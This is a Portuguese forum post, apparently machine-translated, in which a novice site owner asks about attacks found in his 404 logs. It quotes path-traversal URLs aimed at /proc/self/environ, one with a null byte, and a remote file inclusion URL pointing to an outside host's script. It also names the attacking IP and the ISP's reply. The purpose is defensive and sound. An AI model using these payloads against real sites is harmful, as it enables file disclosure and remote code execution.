Examinando meus 404 logs, observei os dois URLs a seguir, os quais ocorreram uma vez:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
e
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
A página em questão library.php
requer uma type
variável com meia dúzia de valores aceitáveis diferentes e, em seguida, uma id
variável. Portanto, um URL válido pode ser
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
e os IDs são executados mysql_real_escape_string
antes de serem usados para consultar o banco de dados.
Sou um novato, mas me parece que esses dois links são simples ataques contra o webroot?
1) Qual a melhor forma de se proteger contra esse tipo de coisa além do 404?
2) Devo permaban o (s) IP (s) responsável (s)?
EDIT: também acabei de notar este
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: O IP ofensivo para todos os três ataques foi o 216.97.231.15
rastreio para um ISP chamado Lunar Pages localizado nos arredores de Los Angeles.
EDIÇÃO 3: Decidi ligar para o ISP na sexta-feira de manhã no horário local e discutir o assunto com quem eu puder telefonar. Vou postar os resultados aqui em 24 horas ou mais.
EDIÇÃO 4: acabei enviando um e-mail aos administradores e eles responderam primeiro que "estavam pesquisando" e, um dia depois, com "esse problema deve ser resolvido agora". Infelizmente, não há mais detalhes.
type
diz o script que incluem a utilização (embora através de um IF $_GET['type'] == 'thing') {} ESLE...
, não como um link direto como include 'type.php'
) eo id
é executado através de mysql_real_escape_string e que é usado para consultas. Sabendo disso, ainda estou seguro?